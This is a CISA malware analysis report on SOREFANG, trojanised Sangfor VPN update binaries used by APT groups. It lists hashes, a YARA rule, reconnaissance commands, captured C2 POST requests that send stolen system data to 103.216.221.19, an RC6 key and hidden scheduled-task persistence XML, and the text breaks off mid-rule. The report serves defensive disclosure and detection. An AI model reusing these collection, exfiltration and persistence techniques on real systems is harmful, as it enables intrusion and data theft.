{ "id": "209d51df-693e-44ae-a67e-b1f128ac4337", "created_at": "2026-04-06T00:14:41.080079Z", "updated_at": "2026-04-10T13:11:59.510426Z", "deleted_at": null, "sha1_hash": "448f393460de04c59c1205a79cf61e1ee1d6909f", "title": "MAR-10296782-1.v1 – SOREFANG | CISA", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 101055, "plain_text": "MAR-10296782-1.v1 – SOREFANG | CISA\r\nPublished: 2020-07-16 · Archived: 2026-04-02 10:53:56 UTC\r\nNotification\r\nThis report is provided \"as is\" for informational purposes only. The Department of Homeland Security (DHS) does not\r\nprovide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial\r\nproduct or service referenced in this bulletin or otherwise.\r\nThis document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries\r\nminimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to\r\nstandard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the\r\nTraffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.\r\nSummary\r\nDescription\r\nThe Malware Analysis Report (MAR) is the result of analytic efforts by the Cybersecurity and Infrastructure Security\r\nAgency (CISA). This malware has been identified as SOREFANG. Advanced persistent threat (APT) groups have been\r\nidentified using this malware. For more information regarding this malware, please visit:\r\nhttps://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development\r\nThis report analyzes three unique files. The files are Trojan implants designed to exploit Sangfor Secure Sockets Layer\r\n(SSL) virtual private network (VPN) servers. The malware replaces the Sangfor VPN software distributed to VPN clients.\r\nWhen installed, the implants provide the remote operator total control over the infected systems.\r\nFor a downloadable copy of IOCs, see MAR-10296782-1.v1.stix.\r\nSubmitted Files (3)\r\n58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2 (58d8e65976b53b77645c248bfa18c3...)\r\n65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75 (65495d173e305625696051944a36a0...)\r\na4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064 (a4b790ddffb3d2e6691dcacae08fb0...)\r\nIPs (2)\r\n103.216.221.19\r\n192.168.169.103\r\nFindings\r\n65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75\r\nTags\r\nspywaretrojan\r\nDetails\r\nName 65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75\r\nSize 437760 bytes\r\nType PE32 executable (GUI) Intel 80386, for MS Windows\r\nMD5 c5d5cb99291fa4b2a68b5ea3ff9d9f9a\r\nSHA1 a1b5d50fe87f9c69a0e4da447f8d56155ce59e47\r\nSHA256 65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a\r\nPage 1 of 19\n\nSHA512 1f8e1ad6e910bdf3b251ffbb81b115233eb15be725d420139ba2af4f82009a655856e39bcb4d111b7bd1f135025f73d3eab1f32d1469f0679\r\nssdeep 6144:ifY8W87LY6I0sl/myJy3FkwTCIoo4ECxAO7BjqxNuC:iAV+sl/mey3FnChxCuC\r\nEntropy 6.205690\r\nAntivirus\r\nAhnlab Malware/Win32.Generic\r\nAntiy Trojan/Win32.Wacatac\r\nCyren W32/Trojan.ZYGO-1305\r\nESET a variant of Win32/Spy.Agent.PXZ trojan\r\nIkarus Trojan-Spy.Agent\r\nK7 Spyware ( 0056414e1 )\r\nQuick Heal Trojan.Agentb\r\nTrendMicro TrojanS.6BD050DD\r\nTrendMicro House Call TrojanS.6BD050DD\r\nVirusBlokAda Trojan.Agentb\r\nYARA Rules\r\nrule CISA_10296782_01 : trojan WELLMESS\r\n{\r\nmeta:\r\n    Author = \"CISA Code \u0026 Media Analysis\"\r\n    Date= \"2020-07-06\"\r\n    Last_Modified=\"20200706_1017\"\r\n    Actor=\"n/a\"\r\n    Category=\"Trojan\"\r\n    Family=\"WellMess\"\r\n    Description = \"Detects WellMess implant and SangFor Exploit\"\r\n    MD5_1 = \"4d38ac3319b167f6c8acb16b70297111\"\r\n    SHA256_1 = \"7c39841ba409bce4c2c35437ecf043f22910984325c70b9530edf15d826147ee\"\r\n    MD5_2 = \"a32e1202257a2945bf0f878c58490af8\"\r\n    SHA256_2 = \"a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064\"\r\n    MD5_3 = \"861879f402fe3080ab058c0c88536be4\"\r\n    SHA256_3 = \"14e9b5e214572cb13ff87727d680633f5ee238259043357c94302654c546cad2\"\r\n    MD5_4 = \"2f9f4f2a9d438cdc944f79bdf44a18f8\"\r\n    SHA256_4 = \"e329607379a01483fc914a47c0062d5a3a8d8d65f777fbad2c5a841a90a0af09\"\r\n    MD5_5 = \"ae7a46529a0f74fb83beeb1ab2c68c5c\"\r\n    SHA256_5 = \"fd3969d32398bbe3709e9da5f8326935dde664bbc36753bd41a0b111712c0950\"\r\n    MD5_6 = \"f18ced8772e9d1a640b8b4a731dfb6e0\"\r\n    SHA256_6 = \"953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a\"\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a\r\nPage 2 of 19\n\nMD5_7 = \"3a9cdd8a5cbc3ab10ad64c4bb641b41f\"\r\n    SHA256_7 = \"5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb\"\r\n    MD5_8 = \"967fcf185634def5177f74b0f703bdc0\"\r\n    SHA256_8 = \"58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2\"\r\n    MD5_9 = \"c5d5cb99291fa4b2a68b5ea3ff9d9f9a\"\r\n    SHA256_9 = \"65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75\"\r\n    MD5_10 = \"01d322dcac438d2bb6bce2bae8d613cb\"\r\n    SHA256_10 = \"0c5ad1e8fe43583e279201cdb1046aea742bae59685e6da24e963a41df987494\"\r\n    MD5_11 = \"8777a9796565effa01b03cf1cea9d24d\"\r\n    SHA256_11 = \"83014ab5b3f63b0253cdab6d715f5988ac9014570fa4ab2b267c7cf9ba237d18\"\r\n    MD5_12 = \"507bb551bd7073f846760d8b357b7aa9\"\r\n    SHA256_12 = \"47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854\"\r\nstrings:\r\n    $0 = \"/home/ubuntu/GoProject/src/bot/botlib/chat.go\"\r\n    $1 = \"/home/ubuntu/GoProject/src/bot/botlib.Post\"\r\n    $2 = \"GoProject/src/bot/botlib.deleteFile\"\r\n    $3 = \"ubuntu/GoProject/src/bot/botlib.generateRandomString\"\r\n    $4 = \"GoProject/src/bot/botlib.AES_Decrypt\"\r\n    $5 = { 53 00 63 00 72 00 69 00 70 00 74 00 00 0F 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 00 07 2F 00 63 }\r\n    $6 = { 3C 00 6E 00 77 00 3E 00 2E 00 2A 00 29 00 00 0B 24 00 7B 00 66 00 6E 00 7D }\r\n    $7 = { 7B 00 61 00 72 00 67 00 7D 00 00 0B 24 00 7B 00 6E 00 77 00 7D }\r\n    $8 = { 52 61 6E 64 6F 6D 53 74 72 69 6E 67 00 44 65 6C 65 74 65 46 69 6C 65 }\r\n    $9 = \"get_keyRC6\"\r\n    $10 = { 7D A3 26 77 1D 63 3D 5A 32 B4 6F 1F 55 49 44 25 }\r\n    $11 = { 47 C2 2F 35 93 41 2F 55 73 0B C2 60 AB E1 2B 42 }\r\n    $12 = { 53 58 9B 17 1F 45 BD 72 EC 01 30 6C 4F CA 93 1D }\r\n    $13 = { 48 81 21 81 5F 53 3A 64 E0 ED FF 21 23 E5 00 12 }\r\n    $14 = \"GoProject/src/bot/botlib.wellMess\"\r\n    $15 = { 62 6F 74 6C 69 62 2E 4A 6F 69 6E 44 6E 73 43 68 75 6E 6B 73 }\r\n    $16 = { 62 6F 74 6C 69 62 2E 45 78 65 63 }\r\n    $17 = { 62 6F 74 6C 69 62 2E 47 65 74 52 61 6E 64 6F 6D 42 79 74 65 73 }\r\n    $18 = { 62 6F 74 6C 69 62 2E 4B 65 79 }\r\n    $19 = { 7F 16 21 9D 7B 03 CB D9 17 3B 9F 27 B3 DC 88 0F }\r\n    $20 = { D9 BD 0A 0E 90 10 B1 39 D0 C8 56 58 69 74 15 8B }\r\n    $21 = { 44 00 59 00 4A 00 20 00 36 00 47 00 73 00 62 00 59 00 31 00 2E }\r\n    $22 = { 6E 00 20 00 46 00 75 00 7A 00 2C 00 4B 00 5A 00 20 00 33 00 31 00 69 00 6A 00 75 }\r\n    $23 = { 43 00 31 00 69 00 76 00 66 00 39 00 32 00 20 00 56 00 37 00 6C 00 4F 00 48 }\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a\r\nPage 3 of 19\n\n$24 = { 66 69 6C 65 4E 61 6D 65 3A 28 3F 50 3C 66 6E 3E 2E 2A 3F 29 5C 73 61 72 67 73 3A 28 3F 50 3C 61\r\n72 67 3E 2E 2A 3F }\r\n    $25 = { 5C 00 2E 00 53 00 61 00 6E 00 67 00 66 00 6F 00 72 00 55 00 44 00 2E 00 73 00 75 00 6D }\r\n    $26 = { 66 6F 72 6D 2D 64 61 74 61 3B 20 6E 61 6D 65 3D 22 5F 67 61 22 3B 20 66 69 6C 65 6E 61 6D 65 3D }\r\n    $27 = { 40 5B 5E 5C 73 5D 2B 3F 5C 73 28 3F 50 3C 74 61 72 3E 2E 2A 3F 29 5C 73 27 }\r\ncondition:\r\n   ($0 and $1 and $2 and $3 and $4) or ($5 and $6 and $7 and $8 and $9) or ($10 and $11) or ($12 and $13) or ($14)\r\nor ($15 and $16 and $17 and $18) or ($19 and $20) or ($21 and $22 and $23) or ($24) or ($25 and $26) or ($27)\r\n}\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 2018-03-28 07:37:41-04:00\r\nImport Hash de67eebbdb41eb69bfdf6c23a6479582\r\nCompany Name Sangfor Technologies Co.,Ltd\r\nFile Description SangforUD\r\nInternal Name SangforUD.exe\r\nLegal Copyright Copyright (C) 2015\r\nOriginal Filename SangforUD.EXE\r\nProduct Name SangforUD application\r\nProduct Version 7.6.0.100\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n79b491fc5059891654fc228b26171f6d header 1024 3.067812\r\n471b9d4a35e5f8b569ae1ca6bc91aba1 .text 240128 6.589660\r\nd74b8d761debb3939c3878052199ffa2 .rdata 74240 5.586653\r\n463a4a2ba2e9496201b711302c4e3008 .data 5120 3.612142\r\n1f354d76203061bfdd5a53dae48d5435 .tls 512 0.020393\r\ne9edb21c8ad50896cd623d0172835e6d .rsrc 103936 3.885868\r\n1d7b5cd8dcec22299f23bb463562815a .reloc 12800 6.559632\r\nPackers/Compilers/Cryptors\r\nRelationships\r\n65495d173e... Connected_To 103.216.221.19\r\nDescription\r\nThis application is a malicious 32-bit Windows executable. The executable exploits a vulnerability identified within Sangfor\r\nSSL VPN devices. The vulnerability can be leveraged to gain control over systems because the VPN clients do not properly\r\nverify the integrity of software updates. The malware exploits this vulnerability by replacing software update binaries on\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a\r\nPage 4 of 19\n\ncompromised VPN servers. The malicious binaries are then delivered and executed on the VPN clients reporting to the\r\ninfected VPN server.\r\nDuring runtime, the malware immediately attempts to clear all files from the directories \"\\\\Sangfor\\\\SSL\\\\Log\\\\\" and\r\n\"\\\\Sangfor\\\\SSL\\\\Dump\\\\”.\r\nThe malware then attempts to install itself as the file \"\\\\Sangfor\\\\SSL\\\\SanforUPD.exe”. This will make this binary\r\npresumably the first update executable that gets served out as application updates to targeted Sangfor VPN clients.\r\nNext, it checks for the presence of a file named \"\\\\Sangfor\\\\SSL\\\\.SangforUD.sum”. If this file is not present, the malware\r\nwill collect information from the infected system, using the following commands:\r\n—Begin Information Collection Commands—\r\nsysteminfo.exe\r\nipconfig.exe /all\r\ncmd.exe /c set\r\nnet.exe user\r\nHOSTNAME.EXE\r\nnet.exe user /domain\r\nnet.exe group /domain\r\ntasklist.exe /V\r\nwhoami.exe /all\r\n—End Information Collection Commands—\r\nIt will also enumerate folders on disk. The collected system information and the result of the file enumerations are stored in\r\na buffer in system memory. The malware collected the following information during analysis:\r\n—Begin Information Collected—\r\nUser information (user name and SID)\r\nGroup information (Group name, type, SID, and attributes)\r\nPrivileges information (Privilege name, description, state (disabled, enabled, N/A))\r\n—End Information Collected—\r\nThis data will next be encrypted, encoded, and then transmitted to the command and control (C2) server Internet Protocol\r\n(IP) address 103.216.221.19.\r\nThe data sent to the C2 server is encrypted utilizing a Rivest cipher 6 (RC6) cryptographic algorithm. The key used to\r\nencrypt the outbound data is dynamically generated during each C2 session. The RC6 key is appended to the outbound data\r\nso the remote operator will be able to decrypt the incoming data. The RC6 key can be found within the “filename” field of\r\nthe C2 outbound data. For example, in the following example (partial) transmission the RC6 key\r\nd4908a2e47ff25c44054f8e623426243 can be utilized to decrypt the C2 data.\r\n—Begin Partial C2 Transmission—\r\nPOST / HTTP/1.1\r\nContent-Type: multipart/form-data; boundary=----974767299852498929531610575\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1\r\nHost: 103.216.221.19\r\nContent-Length: 38886\r\nCache-Control: no-cache\r\n------974767299852498929531610575\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a\r\nPage 5 of 19\n\nContent-Disposition: form-data; name=\"_ga\"; filename=\"d4908a2e47ff25c44054f8e623426243\"\r\nContent-Type: application/octet-stream\r\ncktTaQTE2ed BUVZaeg tMkXS 5YrSj6zdDKXYl2v LQCi85ZruMOUmkSLpc0f Tychyjhpo9fJHt5EIQw, ZREaS.\r\n3s4al2OGFMBkiqrDsN, EMfzzmDWPGoATf, oM3n kvApOjc85g1jx qACIwvhAC3lz3jTb3p6D, YI2gZ63Wpob9Bm88\r\ngZIqfg6h. ohjr ecwax41ACb9Bm8khPfh hO0Aku, VqtXhmDmOTUen 019HaS6Wmy639Km ttKwx62W2EIw.\r\nvhAC3kKL, zp3Gg CQdqXRmDmOTWe1n0IZD, EEVytbV4Zg5jk1Hp9Nf, R2kuvB06xoA. kHazjW0VlmP7J KUxnye\r\n—End Partial C2 Transmission—\r\nThe encrypted C2 traffic is encoded with a slightly modified Base64 algorithm. The encoded data appears to match Base64\r\nencoded data except there are spaces in between parts of the data (0x20). An example of this is illustrated below where the\r\nfirst 32-bytes of the outbound data is replaced with the American Standard Code for Information Interchange (ASCII) bytes\r\n“x”.\r\n—Begin Base64 Modification—\r\nPOST / HTTP/1.1\r\nContent-Type: multipart/form-data; boundary=----974767299852498929531610575\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1\r\nHost: 103.216.221.19\r\nContent-Length: 24307\r\nCache-Control: no-cache\r\n------974767299852498929531610575\r\nContent-Disposition: form-data; name=\"_ga\"; filename=\"7e061a180fa24eb5a318d6eae8797cc2\"\r\nContent-Type: application/octet-stream\r\neHh4eH h4eHh4eHh4eHh4eHh4eH h4eHh4eH h4eHh4eHhB6e, RwoJe. cqpDFRSyMwBqaG4 INaFZG9zm2\r\nA7siND60oM4QhhCrf oAiAvC OUMq3, W1ZlPGq kKhkRkwjNYu1dc6. bUmU8ashTA Q8KSyp2xCnA m3A24PU\r\n6KLQqzPsMiMmEZ9A, EQF4. Ryhld1t WZTxqZCoZEZMKzA6gq TaENSD6e6Izy9Caj6 W3Z9jNkB1\r\n7tQpuEnU266hhaEc 4WwEPCkssdCs4GF. MoVXhKQHl6C aj4t8u6I ueaakH1 60jPL 0JqH1 bdn2M.\r\n2QHWcgYUyhVeEqhj6I Pu6ANJXvs, zSvNsUXthp5NIDV0i\r\n—End Base64 Modification—\r\nAs illustrated, it appears exactly like the Base64 output of encoding the ASCII bytes “x” with the exception of the periodic\r\nspaces within the encoded data.\r\nThe malware will attempt to query its remote C2 server every 900000 milliseconds with the POST request containing\r\nencrypted information about the victim system, each time querying the server for 260 bytes of data and searching it for the\r\nvalue “200” to ensure the data was received successfully, and the remote C2 server is alive (Figure 1).\r\nIf the malware is able to successfully pass and receive data from its C2 server, it will then generate 32-bytes of data and\r\nrecord the data into a file named \"\\\\Sangfor\\\\SSL\\\\.SangforUD.sum”.\r\nThe malware will then enter a loop in which it attempts to download payloads from its C2 server every 900000 milliseconds.\r\nThe 32-bytes of data contained with the newly created file “.SangforUD.sum” will be contained within these connections to\r\nthe malware’s C2 server.\r\nIt is not known what the C2 server does with this 32-byte value, however the malware only creates this 32-byte value and\r\nwrites it to the file “SangforUD.sum” once, which suggests the 32-bit value is a unique identifier for each compromised\r\nVPN server.\r\nEach payload downloaded from the C2 server will be immediately Base64 decoded, RC6 decrypted, executed using\r\nCreateProcessW, and then copied to the system as \"\\\\Sangfor\\\\SSL\\\\SangforUDC.exe\".\r\nIn addition, the malware decrypts the following Extensible Markup Language (XML) data indicating it uses scheduled tasks\r\nto attain persistence on a target Windows system. This data is decrypted using the RC6 algorithm with the key:\r\n2B6233EB3E872FF78988F4A8F3F6A3BA.\r\n—Begin Decrypted XML Task Data—\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a\r\nPage 6 of 19\n\n\u003c?xml version=\"1.0\" encoding=\"UTF-16\"?\u003e\r\n\u003c Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\"\u003e\r\n\u003c RegistrationInfo\u003e\r\n\u003c Date\u003e2019-07-16T06:00:28.6871947\u003c/Date\u003e\r\n\u003c Author\u003eSangfor Technologies Co.,Ltd\u003c/Author\u003e\r\n\u003c URI\u003eSangforUpade\u003c/URI\u003e\r\n\u003c /RegistrationInfo\u003e\r\n\u003c Triggers\u003e\r\n\u003c CalendarTrigger\u003e\r\n\u003c Repetition\u003e\r\n\u003c Interval\u003eP1D\u003c/Interval\u003e\r\n\u003c StopAtDurationEnd\u003efalse\u003c/StopAtDurationEnd\u003e\r\n\u003c /Repetition\u003e\r\n\u003c StartBoundary\u003e2019-07-16T00:00:00\u003c/StartBoundary\u003e\r\n\u003c Enabled\u003etrue\u003c/Enabled\u003e\r\n\u003c ScheduleByDay\u003e\r\n\u003c DaysInterval\u003e1\u003c/DaysInterval\u003e\r\n\u003c /ScheduleByDay\u003e\r\n\u003c /CalendarTrigger\u003e\r\n\u003c /Triggers\u003e\r\n\u003c Settings\u003e\r\n\u003c MultipleInstancesPolicy\u003eParallel\u003c/MultipleInstancesPolicy\u003e\r\n\u003c DisallowStartIfOnBatteries\u003efalse\u003c/DisallowStartIfOnBatteries\u003e\r\n\u003c StopIfGoingOnBatteries\u003efalse\u003c/StopIfGoingOnBatteries\u003e\r\n\u003c AllowHardTerminate\u003etrue\u003c/AllowHardTerminate\u003e\r\n\u003c StartWhenAvailable\u003etrue\u003c/StartWhenAvailable\u003e\r\n\u003c RunOnlyIfNetworkAvailable\u003efalse\u003c/RunOnlyIfNetworkAvailable\u003e\r\n\u003c IdleSettings\u003e\r\n\u003c StopOnIdleEnd\u003etrue\u003c/StopOnIdleEnd\u003e\r\n\u003c RestartOnIdle\u003efalse\u003c/RestartOnIdle\u003e\r\n\u003c /IdleSettings\u003e\r\n\u003c AllowStartOnDemand\u003etrue\u003c/AllowStartOnDemand\u003e\r\n\u003c Enabled\u003etrue\u003c/Enabled\u003e\r\n\u003c Hidden\u003etrue\u003c/Hidden\u003e\r\n\u003c RunOnlyIfIdle\u003efalse\u003c/RunOnlyIfIdle\u003e\r\n\u003c DisallowStartOnRemoteAppSession\u003efalse\u003c/DisallowStartOnRemoteAppSession\u003e\r\n\u003c UseUnifiedSchedulingEngine\u003etrue\u003c/UseUnifiedSchedulingEngine\u003e\r\n\u003c WakeToRun\u003etrue\u003c/WakeToRun\u003e\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a\r\nPage 7 of 19\n\n\u003c ExecutionTimeLimit\u003ePT0S\u003c/ExecutionTimeLimit\u003e\r\n\u003c Priority\u003e7\u003c/Priority\u003e\r\n\u003c RestartOnFailure\u003e\r\n\u003c Interval\u003ePT1M\u003c/Interval\u003e\r\n\u003c Count\u003e3\u003c/Count\u003e\r\n\u003c /RestartOnFailure\u003e\r\n\u003c /Settings\u003e\r\n\u003c Actions Context = \"Author\"\u003e\r\n\u003c Exec\u003e\r\n\u003c Command\u003e\u003c/Command\u003e\r\n\u003c /Exec\u003e\r\n\u003c /Actions\u003e\r\n—End Decrypted XML Task Data—\r\nScreenshots\r\nFigure 1 - Screenshot of the connection to the C2 server when attempting to download an RC6 encrypted executable\r\npayload. Note: the unique identifier is within the \"_ga=\" field.\r\nFigure 2 - Screenshot of the malware querying the C2 server after conducting the initial connection. The initial connection\r\nwill pass information stolen from the target system to the C2 server, including a unique hash used as a victim system\r\nidentifier. After a successful initial connection with the C2, the malware will begin attempting to download RC6 executable\r\npayloads.\r\nFigure 3 - Screenshot of the initialization function for the RC6 algorithm contained in the malware.\r\n103.216.221.19\r\nTags\r\ncommand-and-control\r\nHTTP Sessions\r\nPOST / HTTP/1.1\r\nContent-Type: multipart/form-data; boundary=----974767299852498929531610575\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1\r\nHost: 103.216.221.19\r\nContent-Length: 38886\r\nCache-Control: no-cache\r\nWhois\r\nQueried whois.apnic.net with \"103.216.221.19\"...\r\n% Information related to '103.216.220.0 - 103.216.223.255'\r\n% Abuse contact for '103.216.220.0 - 103.216.223.255' is 'abuse@hostuniversal.com.au'\r\ninetnum:        103.216.220.0 - 103.216.223.255\r\nnetname:        HOST-AU\r\ndescr:         Host Universal Pty Ltd\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a\r\nPage 8 of 19\n\ncountry:        AU\r\norg:            ORG-HUPL1-AP\r\nadmin-c:        HUPL1-AP\r\ntech-c:         HUPL1-AP\r\nabuse-c:        AH892-AP\r\nstatus:         ALLOCATED PORTABLE\r\nremarks:        --------------------------------------------------------\r\nremarks:        To report network abuse, please contact mnt-irt\r\nremarks:        For troubleshooting, please contact tech-c and admin-c\r\nremarks:        Report invalid contact via www.apnic.net/invalidcontact\r\nremarks:        --------------------------------------------------------\r\nmnt-by:         APNIC-HM\r\nmnt-lower:     MAINT-HOST-AU\r\nmnt-routes:     MAINT-HOST-AU\r\nmnt-irt:        IRT-HOST-AU\r\nlast-modified: 2020-06-10T13:06:06Z\r\nsource:         APNIC\r\nirt:            IRT-HOST-AU\r\naddress:        Host Universal Pty Ltd, c/o Brentnalls SA, 255 Port Road, Hindmarsh SA 5007, Australia, Hindmarsh So\r\ne-mail:         abuse@hostuniversal.com.au\r\nabuse-mailbox: abuse@hostuniversal.com.au\r\nadmin-c:        HUPL1-AP\r\ntech-c:         HUPL1-AP\r\nauth:         # Filtered\r\nremarks:        abuse@hostuniversal.com.au was validated on 2020-06-25\r\nmnt-by:         MAINT-HOST-AU\r\nlast-modified: 2020-06-25T16:58:38Z\r\nsource:         APNIC\r\norganisation: ORG-HUPL1-AP\r\norg-name:     Host Universal Pty Ltd\r\ncountry:        AU\r\naddress:        Host Universal Pty Ltd\r\naddress:        c/o Brentnalls SA\r\naddress:        255 Port Road, Hindmarsh SA 5007, Australia\r\nphone:         +61403394019\r\ne-mail:         abuse@hostuniversal.com.au\r\nmnt-ref:        APNIC-HM\r\nmnt-by:         APNIC-HM\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a\r\nPage 9 of 19\n\nlast-modified: 2018-03-20T12:57:09Z\r\nsource:         APNIC\r\nrole:         ABUSE HOSTAU\r\naddress:        Host Universal Pty Ltd, c/o Brentnalls SA, 255 Port Road, Hindmarsh SA 5007, Australia, Hindmarsh So\r\ncountry:        ZZ\r\nphone:         +000000000\r\ne-mail:         abuse@hostuniversal.com.au\r\nadmin-c:        HUPL1-AP\r\ntech-c:         HUPL1-AP\r\nnic-hdl:        AH892-AP\r\nremarks:        Generated from irt object IRT-HOST-AU\r\nabuse-mailbox: abuse@hostuniversal.com.au\r\nmnt-by:         APNIC-ABUSE\r\nlast-modified: 2020-06-10T13:06:05Z\r\nsource:         APNIC\r\nrole:         Host Universal Pty Ltd administrator\r\naddress:        Host Universal Pty Ltd, c/o Brentnalls SA, 255 Port Road, Hindmarsh SA 5007, Australia, Hindmarsh So\r\ncountry:        AU\r\nphone:         +61403394019\r\nfax-no:         +61403394019\r\ne-mail:         abuse@hostuniversal.com.au\r\nadmin-c:        HUPL1-AP\r\ntech-c:         HUPL1-AP\r\nnic-hdl:        HUPL1-AP\r\nmnt-by:         MAINT-HOST-AU\r\nlast-modified: 2016-05-03T06:34:59Z\r\nsource:         APNIC\r\n% Information related to '103.216.221.0/24AS136557'\r\nroute:         103.216.221.0/24\r\norigin:         AS136557\r\ndescr:         Host Universal Pty Ltd\r\n               Host Universal Pty Ltd\r\n               c/o Brentnalls SA\r\n               255 Port Road, Hindmarsh SA 5007, Australia\r\nmnt-by:         MAINT-HOST-AU\r\nlast-modified: 2019-12-19T00:21:46Z\r\nsource:         APNIC\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a\r\nPage 10 of 19\n\nRelationships\r\n103.216.221.19 Connected_From 65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75\r\n103.216.221.19 Connected_From 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2\r\nDescription\r\n65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75 and\r\n58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2 attempt to connect to the IP address.\r\n58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2\r\nTags\r\nspywaretrojan\r\nDetails\r\nName 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2\r\nSize 428032 bytes\r\nType PE32 executable (GUI) Intel 80386, for MS Windows\r\nMD5 967fcf185634def5177f74b0f703bdc0\r\nSHA1 152189b62c546d6297a7083778fba62dcec576be\r\nSHA256 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2\r\nSHA512 184dba49900a9b7c2c170c857806bff67c2fb51bcfad672f841d8c484e0c4452a3599f237dadbd6b6eb44a5f541dd6282bee4654486f50031\r\nssdeep 6144:AC70wZI2ZhjKOYTvkh+YVSn9bEAMpNZr3qHLAONXGCSxfuMBES:/lZIpQoYVmZERH0LguMWS\r\nEntropy 6.211072\r\nAntivirus\r\nAhnlab Malware/Win32.Generic\r\nAntiy Trojan/Win32.Wacatac\r\nESET a variant of Win32/Spy.Agent.PXZ trojan\r\nIkarus Trojan-Spy.Agent\r\nK7 Spyware ( 0056414e1 )\r\nMicrosoft Security Essentials Trojan:Win32/Skeeyah.B!rfn\r\nQuick Heal Trojan.Agentb\r\nTrendMicro TrojanS.F2D90167\r\nTrendMicro House Call TrojanS.F2D90167\r\nYARA Rules\r\nrule CISA_10296782_01 : trojan WELLMESS\r\n{\r\nmeta:\r\n    Author = \"CISA Code \u0026 Media Analysis\"\r\n    Date= \"2020-07-06\"\r\n    Last_Modified=\"20200706_1017\"\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a\r\nPage 11 of 19\n\nActor=\"n/a\"\r\n    Category=\"Trojan\"\r\n    Family=\"WellMess\"\r\n    Description = \"Detects WellMess implant and SangFor Exploit\"\r\n    MD5_1 = \"4d38ac3319b167f6c8acb16b70297111\"\r\n    SHA256_1 = \"7c39841ba409bce4c2c35437ecf043f22910984325c70b9530edf15d826147ee\"\r\n    MD5_2 = \"a32e1202257a2945bf0f878c58490af8\"\r\n    SHA256_2 = \"a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064\"\r\n    MD5_3 = \"861879f402fe3080ab058c0c88536be4\"\r\n    SHA256_3 = \"14e9b5e214572cb13ff87727d680633f5ee238259043357c94302654c546cad2\"\r\n    MD5_4 = \"2f9f4f2a9d438cdc944f79bdf44a18f8\"\r\n    SHA256_4 = \"e329607379a01483fc914a47c0062d5a3a8d8d65f777fbad2c5a841a90a0af09\"\r\n    MD5_5 = \"ae7a46529a0f74fb83beeb1ab2c68c5c\"\r\n    SHA256_5 = \"fd3969d32398bbe3709e9da5f8326935dde664bbc36753bd41a0b111712c0950\"\r\n    MD5_6 = \"f18ced8772e9d1a640b8b4a731dfb6e0\"\r\n    SHA256_6 = \"953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a\"\r\n    MD5_7 = \"3a9cdd8a5cbc3ab10ad64c4bb641b41f\"\r\n    SHA256_7 = \"5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb\"\r\n    MD5_8 = \"967fcf185634def5177f74b0f703bdc0\"\r\n    SHA256_8 = \"58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2\"\r\n    MD5_9 = \"c5d5cb99291fa4b2a68b5ea3ff9d9f9a\"\r\n    SHA256_9 = \"65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75\"\r\n    MD5_10 = \"01d322dcac438d2bb6bce2bae8d613cb\"\r\n    SHA256_10 = \"0c5ad1e8fe43583e279201cdb1046aea742bae59685e6da24e963a41df987494\"\r\n    MD5_11 = \"8777a9796565effa01b03cf1cea9d24d\"\r\n    SHA256_11 = 